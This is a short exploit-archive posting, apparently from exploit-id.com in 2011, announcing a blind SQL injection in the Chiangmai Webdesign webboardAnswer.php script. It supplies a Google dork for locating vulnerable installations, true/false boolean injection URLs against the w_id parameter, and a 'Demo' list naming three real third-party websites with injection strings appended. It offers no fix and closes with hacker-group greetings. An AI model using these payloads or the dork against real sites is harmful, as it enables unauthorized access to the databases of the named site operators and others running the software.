Chiangmai Webdesign (webboardAnswer.php)<= Blind SQL injection Vulnerability



EKU-ID: 391 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-06-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member from exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: Chiangmai Webdesign (webboardAnswer.php)<= Blind SQL injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"Powered by Chiangmai Webdesign" inurl:webboardAnswer.php
# Tested on: [Windows Vista Edition Intégrale]
####


[*] ## ExPLo!T:

http://127.0.0.1/webboardAnswer.php?w_id=0004'


http://127.0.0.1/webboardAnswer.php?w_id=0004 and 1=1--        [*] True


http://127.0.0.1/webboardAnswer.php?w_id=0004 and 1=2--        [*] False


http://127.0.0.1/webboardAnswer.php?w_id=[SQLI]                [*] Ev!L



####


[*]## Demo:

http://www.northpower.co.th/webboardAnswer.php?w_id=00024'

http://karnmontfort.com/webboardAnswer.php?w_id=0043'

http://www.agribizcmu.com/webboardAnswer.php?w_id=00041'


####

Peace From Algeria

####


=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,|
  KinG Of PiraTeS , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                     |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
  RmZ ...others                                                                              |
============================================================================================ |